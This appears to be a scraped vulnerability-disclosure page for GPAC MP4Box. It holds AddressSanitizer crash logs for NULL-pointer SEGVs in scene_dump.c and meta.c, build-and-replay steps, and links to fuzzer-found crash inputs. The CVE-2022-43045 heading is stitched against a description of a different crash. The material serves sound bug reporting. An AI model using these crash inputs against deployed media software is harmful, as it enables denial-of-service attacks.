https://github.com/17ssDP/fuzzer\_crashes/blob/main/gpac/mp4box-bt-segv-1

**ASAN**

    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent minf
    [iso file] Missing DataInformationBox
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Read Box type 0000 (0x30303030) at position 11542 has size 0 but is not at root/file level. Forbidden, skipping end of parent box !
    [iso file] Box "moov" (start 20) has 806 extra bytes
    [iso file] Unknown top-level box type 0000
    [iso file] Incomplete box 0000 - start 12356 size 808358436
    [iso file] Incomplete file while reading for dump - aborting parsing
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Unknown box type 0000 in parent minf
    [iso file] Missing DataInformationBox
    [iso file] Unknown box type 0000 in parent moov
    [iso file] Read Box type 0000 (0x30303030) at position 11542 has size 0 but is not at root/file level. Forbidden, skipping end of parent box !
    [iso file] Box "moov" (start 20) has 806 extra bytes
    [iso file] Unknown top-level box type 0000
    [iso file] Incomplete box 0000 - start 12356 size 808358436
    [iso file] Incomplete file while reading for dump - aborting parsing
    MPEG-4 BIFS Scene Parsing
    [ODF] Reading bifs config: shift in sizes (not supported)
    [MP4 Loading] Unable to fetch sample 38 from track ID 8 - aborting track import
    Scene loaded - dumping 1 systems streams
    ASAN:DEADLYSIGNAL
    =================================================================
    ==42376==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x7f6a20c34c94 bp 0x60b000000720 sp 0x7ffd44396130 T0)
    ==42376==The signal is caused by a READ memory access.
    ==42376==Hint: address points to the zero page.
        #0 0x7f6a20c34c93 in gf_dump_vrml_sffield scene_manager/scene_dump.c:693
        #1 0x7f6a20c69012 in gf_dump_vrml_simple_field scene_manager/scene_dump.c:775
        #2 0x7f6a20c5020c in DumpXReplace scene_manager/scene_dump.c:2291
        #3 0x7f6a20c5020c in gf_sm_dump_command_list scene_manager/scene_dump.c:2901
        #4 0x7f6a20c77d57 in gf_sm_dump scene_manager/scene_dump.c:3519
        #5 0x556786082cef in dump_isom_scene /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/filedump.c:221
        #6 0x55678605d7ff in mp4box_main /home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/applications/mp4box/mp4box.c:6336
        #7 0x7f6a1f3bac86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #8 0x55678602f0a9 in _start (/home/fuzz/dp/chunkfuzzer-evaluation/benchmark/gpac-asan/bin/gcc/MP4Box+0x4e0a9)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV scene_manager/scene_dump.c:693 in gf_dump_vrml_sffield
    ==42376==ABORTING
    

**Environment**

    Ubuntu 16.04
    Clang 10.0.1
    gcc 5.5

CVE-2022-43045: SEGV scene_manager/scene_dump.c:693 in gf_dump_vrml_sffield · Issue #2277 · gpac/gpac

GPAC 2.1-DEV-rev368-gfd054169b-master was discovered to contain a segmentation violation via the function gf_isom_get_meta_item_info at /isomedia/meta.c.

**Description**

SEGV in isomedia/meta.c:177 in gf\_isom\_get\_meta\_item\_info

**Version**

    $ ./MP4Box -version
    MP4Box - GPAC version 2.1-DEV-rev368-gfd054169b-master
    (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io
    
    Please cite our work in your research:
            GPAC Filters: https://doi.org/10.1145/3339825.3394929
            GPAC: https://doi.org/10.1145/1291233.1291452
    
    GPAC Configuration: --enable-sanitizer
    Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_LINUX_DVB  GPAC_DISABLE_3D 
    

**Replay**

    git clone https://github.com/gpac/gpac.git
    cd gpac
    ./configure --enable-sanitizer
    make -j$(nproc)
    ./bin/gcc/MP4Box -info mp4box-info-segv-1
    

**POC**

https://github.com/17ssDP/fuzzer\_crashes/blob/main/gpac/mp4box-info-segv-1

**ASAN**

    [iso file] Unknown box type i000000 in parent iinf
    [iso file] Unknown top-level box type v000000
    [iso file] Incomplete box v000000 - start 308 size 191662031
    [iso file] Incomplete file while reading for dump - aborting parsing
    # File Meta type: "Meta" - 3 resource item(s)
    ASAN:DEADLYSIGNAL
    =================================================================
    ==52314==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000028 (pc 0x7f4d67b428f9 bp 0x000000000000 sp 0x7ffcd749c3c0 T0)
    ==52314==The signal is caused by a READ memory access.
    ==52314==Hint: address points to the zero page.
        #0 0x7f4d67b428f8 in gf_isom_get_meta_item_info isomedia/meta.c:177
        #1 0x55fa2660a89e in DumpMetaItem /gpac/applications/mp4box/filedump.c:2467
        #2 0x55fa26642cc8 in DumpMovieInfo /gpac/applications/mp4box/filedump.c:3820
        #3 0x55fa265efee4 in mp4box_main /gpac/applications/mp4box/mp4box.c:6359
        #4 0x7f4d669cfc86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86)
        #5 0x55fa265c00a9 in _start (/gpac/bin/gcc/MP4Box+0x4e0a9)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV isomedia/meta.c:177 in gf_isom_get_meta_item_info
    ==52314==ABORTING
    

**Environment**

    Ubuntu 16.04
    Clang 10.0.1
    gcc 5.5

Tag

#linux